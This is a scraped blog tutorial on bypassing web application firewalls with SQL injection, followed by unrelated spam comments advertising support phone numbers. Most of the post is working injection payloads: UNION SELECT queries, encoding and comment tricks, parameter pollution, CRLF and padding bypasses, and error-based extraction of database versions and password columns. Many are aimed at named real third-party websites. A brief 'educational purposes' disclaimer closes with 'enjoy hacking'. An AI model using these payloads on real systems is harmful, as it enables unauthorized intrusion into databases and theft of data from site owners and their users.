SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL)

SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL) - we say welcome to you who have been searching for information via search engines such as Google, in a blog Tech Gallery, now we will discuss information about the SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL), we have been looking for a lot of information from a trusted and collect it in this blog, so you get the information complete and easy to understand, please read through:

Article How To Become A Hacker, Article Learn Hacking,

You can also see our article on:


 ***this tutorial to show you how to Bypass WAF(Web Application Firewall)***
http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?

id=-130+Union+select+1,2,3,4,5,6,7,8,9--

SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL)
SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL)


like we see [select] is down let's double text [Replacing keywords] like this SeLselectECT
www.instintocigano.com.br/artigos-de-baralho-cigano.php
id=-130+UnIoN+SeLselectECT+1,2,3,4,5,6,7,8,9--
[5] WAF Bypassing – using characters.
There is a whole bunch of characters available we can use to bypass WAF filters.
following characters can do this:
|, ?, ", ', *, %, £ , [], ;, :, \/, $, €, ()...
by using these characters in lots of cases /*!*/ is not filtered. But the sign * is replaced whit a space and union – select are filtered. which means replacing the keywords would not work.
In these cases we can simply use the * character to split the keywords.
We would do the next logical thing:
www.[site].com/index.php?id=-1+uni*on+sel*ect+1,2,3,4--+-
Almost the same as splitting keywords.
But in this case only * is filtered out by the was replacing it whit a space having the same result as in splitting keywords.
[6] Advanced WAF Bypassing – Capitalization.
Another way is to simply capitalize our characters.
Instead of union UnIoN In some basic WAF’s this will work.
An example in URL:
www.[site].com/index.php?id=-1+UnIoN+SeLeCt+1,2,3,4--+-
[7] HTTP Parameter Pollution (HPP)
HTTP Parameter Pollution (HPP) is a Web attack evasion technique that allows an attacker to craft a HTTP request in order to manipulate or retrieve hidden information. This evasion technique is based on splitting an attack vector between multiple instances of a parameter with the same name. Since none of the relevant HTTP RFCs define the semantics of HTTP parameter manipulation, each web application delivery platform may deal with it differently. In particular, some environments process such requests by concatenating the values taken from all instances of a parameter name within the request. This behavior is abused by the attacker in order to bypass pattern-based security mechanisms.
we see two SQL injection vectors: "Regular attack" and "Attack using HPP". The regular attack demonstrates a standard SQL injection in the prodID parameter. This attack can be easily identified by a security detection mechanism, such as a Web Application Firewall (WAF). The second attack [Figure:2] uses HPP on the prodID parameter. In this case, the attack vector is distributed across multiple occurrences of the prodID parameter. With the correct combination of technology environment and web server, the attack succeeds. In order for a WAF to identify and block the complete attack vector it required to also check the concatenated inputs.
http://testasp.vulnweb.com/showforum.asp?id=-1 union select 1,2 --
testasp.vulnweb.com/showforum.asp?id=-1/* &id= */union/* &id= */select/* &id= */1,2 --
HPP technique
Spoiler (Click to View)
[8] CRLF WAF Bypass technique
CR LF means "Carriage Return, Line Feed"
CR LF means "Carriage Return, Line Feed"-it's a DOS hangover from the olden days from when some devices required a Carriage Return, and some devices required a Line Feed to get a new line, so Microsoft decided to just make a new-line have both characters, so that they would output correctly on all devices.
Windows programs expect their newline format in CRLF (\r\n). *nix expect just LF data (\n). If you open a Unix text document in Notepad on windows, you'll notice that all of the line breaks dissapear and the entire document is on one line. That's because Notepad expects CRLF data, and the Unix document doesn't have the \r character.
There are applications that will convert this for you on a standard *nix distro (dos2unix and unix2dos)
For those wondering, a carriage return and a line feed differ from back in Typewriter days, when a carriage return and a line feed were two different things. One would take you to the beginning of the line (Carriage Return) and a one would move you one row lower, but in the same horizontal location (Line Feed)
CRLF technique
Syntax :
PHP Code:
%0A%0D+Mysql Statement's+%0A%0D
?id=-2+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D/*!+77771,77772,unhex(hex(/*!password*/)),77774+from+/*!`users`*/-- -
Example in URL:
fpchurch.org.uk/News/view.php?id=-26+%0A%0Dunion%0A%0D+%0A%0Dselect%0A%0D+1,2,3,4,5 --
[9] Fatal Error Occurred bypassing
to understand how we can bypassing Fatal Error Occurred see this Example :
Example in URL:
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,5,6,7,8--
Which it concluded that the error in the structure of one of the columns To avoid this error try changing the word column column value null one by one :-
PHP Code:
http://wwfa.org.uk/article.php?id=-174 UNION SELECT null,2,3,4,5,6,7,8-- Error
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,null,3,4,5,6,7,8-- Error
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,null,4,5,6,7,8-- Error
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,null,5,6,7,8-- Error
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,null,6,7,8-- No Error
demo :-
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,null,6,7,8--
[10] Bypass with Information_schema.tables
now I will show you many method to Bypass Information_schema.tables
[1] Spaces
information_schema . tables
[2] Backticks
`information_schema`.`tables`
[3] Specific Code
PHP Code:
/*!information_schema.tables*/
[4] Encoded
FROM+information_schema%20%0C%20.%20%09tables
[5] foo with `.`
(select+group_concat(table_name)`foo`+From+`information_schema`.`tAblES`+Where+table_ScHEmA=schEMA())
[6] Alternative Names
Alternative Names technique with Example :-
PHP Code:
information_schema.statistics
information_schema.key_column_usage
information_schema.table_constraints
information_schema.partitions
The [STATISTICS] table provides information about table indexes.
let's see some Example to extract tables and columns
Example -1 [table] : [information_schema.statistics]
fpchurch.org.uk/News/view.php?id=-26+union+select+1,group_concat(table_name),3,4,5+from+information_schema.statistics --
Example -2 [column] : [information_schema.key_column_usage]
http://fpchurch.org.uk/News/view.php?id=-26+union+select+1,column_name,3,4,5+from+information_schema.key_column_usage+whe?re+table_name=0x7573657273 --
[11] Buffer Overflow bypassing

Majority waf Allowav written in the C language, which makes them vulnerable to override.
A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity. 

In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. Buffer overflow attacks are said to have arisen because the C programming language supplied the framework, and poor programming practices supplied the vulnerability.

In July 2000, a vulnerability to buffer overflow attack was discovered in Microsoft Outlook and Outlook Express. A programming flaw made it possible for an attacker to compromise the integrity of the target computer by simply it sending an e-mail message. Unlike the typical e-mail virus, users could not protect themselves by not opening attached files; in fact, the user did not even have to open the message to enable the attack. The programs' message header mechanisms had a defect that made it possible for senders to overflow the area with extraneous data, which allowed them to execute whatever type of code they desired on the recipient's computers. Because the process was activated as soon as the recipient downloaded the message from the server, this type of buffer overflow attack was very difficult to defend. Microsoft has since created a patch to eliminate the vulnerability.
Buffer Overflow statement in SQLI+and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s)
this AAAAA it's more 1000 A

Example in URL:

PHP Code:

http://www.punjab-dj.com/music/song.php?cat=Punjabi&n==25799' and 0 union select 1,version(),3,4,5,6,7,8,9--+
with Buffer overflow WAF Bypass Unexpected
http://www.punjab-dj.com/music/song.php?cat=Punjabi&n==25799'+and(/*!50000select*/ 1)=(/*!32302select*/ 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?AAAAAAAAAAAAA)+ and 0 union select 1,version(),3,4,5,6,7,8,9--+
http://www.petrobangla.org.bd/notice_details.php?nid=594 and (select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) /*!50000union*/ select 1,version(),3,4,5,6,7,8,9--

Part [2]

now let's see some tricks
[1] Union Select bypassing :-
 
+--+Union+--+Select+--+
+#uNiOn+#sEleCt+
+union+distinct+select+
+union+distinctROW+select+
+union%23aa%0Aselect+
0%a0union%a0select%09
%0Aunion%0Aselect%0A
+UnIoN+SeLselectECT+
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/
+%2F**%2Funion%2F**%2Fselect+
+UnIoN/*&a=*/SeLeCT/*&a=*/
+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
[2] concat bypassing
group_concat()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
CoNcAt()
concat()
CoNcAt()
CONCAT(DISTINCT )
concat(0x3a,,0x3c62723e)
/*!50000cOnCat*/
concat_ws()
concat_ws(0x3a,)
CONCAT_WS(CHAR(32,58,32),version(),)
REVERSE(tacnoc)
binary(version())
uncompress(compress(version()))
aes_decrypt(aes_encrypt(version(),1),1)
[3] LIMIT pybassing
If LIMIT not work we can use :-
 
+LIMIT+0,1
+where+id+=1
WHERE ID_Produit='26 -- -
+having+id+=1
+and length((select password from users having substr(pass,1,1)=’a'))
[4] Null Parameter
id=-1
id=null
id=1+and+false+
id=9999
id=1 and 0
id==1
id=(-1)
=1=1
+And+1=0
/*!and*/+1=0
[5] If Column not Appear
 
Having+1=1 
+and=0+
+div+0+
replace ' = %23 
where 1=1
Example in URL:
http://fpchurch.org.uk/News/view.php?id=-26+div+0+union+select+1,2,3,4,5 --
=2=2 Error based
Example in URL:
 
fpchurch.org.uk/News/view.php?id=26=26+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(version()+as+char),0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) 

 
+union+select 1111,2222,3333-- see sorce
 
http://fpchurch.org.uk/News/view.php?id=-26+div+0+union+select+1111,2222,3333,4444,5555 -- 
 
[6] unhex(hex code :-
unhex(hex(value))
convert(database() using latin1)
cast(value as char)
uncompress(compress(version()))
cast(value as char)
aes_decrypt(aes_encrypt(value,1),1)
binary(value)
convert()
 
Example in URL:
http://www.andytimmons.com/video.php?id=-0004 UNION SELECT 1,2,convert(database() using latin1),4,5,6,7,8--
[7] Requested to WAF bypassing :-
# tables #

 
In tables directly
(/*!50000%53elect*/%0A/*!50000%54able_name*/%0A%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_%53cHema . %54AblES*/%0A/*!50000%57here*/%0A%54able_ScHEmA=schEMA()%0Alimit%0A0,1) 


 

Warning:
The above post is completely for educational purpose only.  Never attempt to follow the above ste
ps against third-party websites.
:D enjoy hacking


Information about the SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL) we have conveyed

A few of our information about the SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL), I hope you can exploit carefully

You have finished reading SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL) and many articles about Tech Gallery in our blog this, please read it. and url link of this article is https://littlebitjohnny.blogspot.com/2016/02/sql-injection-bypassing-waf-web.html Hopefully discussion articles on provide more knowledge about the world of new tech gadgets.

Tag : , ,
Share on Facebook
Share on Twitter
Share on Google+

Related : SQL INJECTION : BYPASSING WAF (WEB APPLICATION FIREWALL)

14 comments:

  1. very interesting and educative. take a bit of your time to check out off white vapes , to get insides on the off white vapes

    ReplyDelete
  2. We are third-party service provider.If you dealing with verizon email issues, hp printer issues, amazon alexa issues and another issues, so then you may visit our website for resolve your own issues.
    Download HP Support Assistant 2021
    Download HP Support Assistant
    HP Support Assistant
    HP Printer Support Assistant
    Download HP Printer Support Assistant

    ReplyDelete
  3. quickbooks error code h202 is one of the common error we face during quickbooks accounting tasks so they need to be fix for the proper functioning,here we have discussed how can we troubleshoot this kind of error easily,for detail info visit the site.

    ReplyDelete
  4. This comment has been removed by the author.

    ReplyDelete
  5. Hi, I am James Aultman, I am working as a tech expert at QuickBooks support. I have 3 years of experience in this field. you have any problems related to "QuickBooks Bex Error", then please contact our expert team of Asquare Cloud hosting at 855-856-0053.

    ReplyDelete
  6. Quickbooks connection diagnostic tool is created to redeem networking and multi-user error occurs in the company file of Quickbooks. As we all know, Quickbooks is an accounting software developed and marketed by Intuit. This is an American software development company, which developed much other software related to Quickbooks accounting software such as Quickbooks install Diagnostic Tool, Quickbooks Tool Hub, and of course Quickbooks Connection Diagnostic Tool.

    ReplyDelete
  7. QuickBooks Error H202 related to the Hosting and Most common symptoms of it is Unable to switch into multi-user mode and If you not able to resolve the error code H202 then i would suggest you to go through the given article and Fix it right away. For more details you can also connect with experts at 800-579-9430.

    ReplyDelete
  8. With a fully dedicated support team, we are able to make complex technical problems transparent, with customer-friendly advice. Pinnacle understands that first class customer service is paramount to a successful relationship which needs to be maintained throughout the lifetime of a partnership.
    Sage 50 Support Number | Sage 100 Support Number | Sage 200 Support Number | Sage 300 Support Number | Sage Error Support Number

    ReplyDelete
  9. To get the most out of your Sage Fixed Assets Support Number, you have to account for everything, including fixed assets before they even become fixed assets.
    Sage Payroll Support Number are a natural extension of the tax, audit, and other financial services you offer. The services help you expand the value and credibility your client expect—and improves your profitability through referral fees at the same time.
    Sage Timeslips provides billing, time and expense tracking designed for professional services businesses. Sage Timeslips Support Number provides advise and upgrade assistance and training on how to best use Sage Timeslips to leverage your investment in Sage Timeslips Software.
    Sage Online Support Number It's better to get help for improving the SAGE Software performance, even get advice about the system compatibility and other issues. The Even business owner asked for solutions for business provided by SAGE company.Get help for calculating taxes, employee payroll, inventory, state & federal tax filing and more.
    Sage 50 Payroll Error 5006 occurs when you try to access the Vendor's website and you fail to do it. The vendor's fails to provide redirection URL which makes it impossible to redirect the website.

    ReplyDelete
  10. You have shared an educational post. Thank you so much for sharing this. I will share it with my friends.
    Visit my recent article which will help you to record PPP Loan Forgiveness in QBDT

    ReplyDelete
  11. Everything is really well stated here. I enjoyed your material because it was also useful.
    I hope my information is useful to you. Check out my latest article- the remote server returned an error 401 unauthorised QuickBooks

    ReplyDelete
  12. Informative post. I can relate to this and I can tell this with experience. I like how you carefully explained everything with important details you can also see my latest blog - QuickBooks Company File Not Found

    ReplyDelete
  13. At Attract Group, their IT consulting services are top-notch, offering expert advice and guidance to help businesses leverage technology effectively. With a focus on improving efficiency, security, and overall performance, their team of professionals delivers tailored solutions to meet each client's specific needs. Trust Attract Group to take your business to the next level.

    ReplyDelete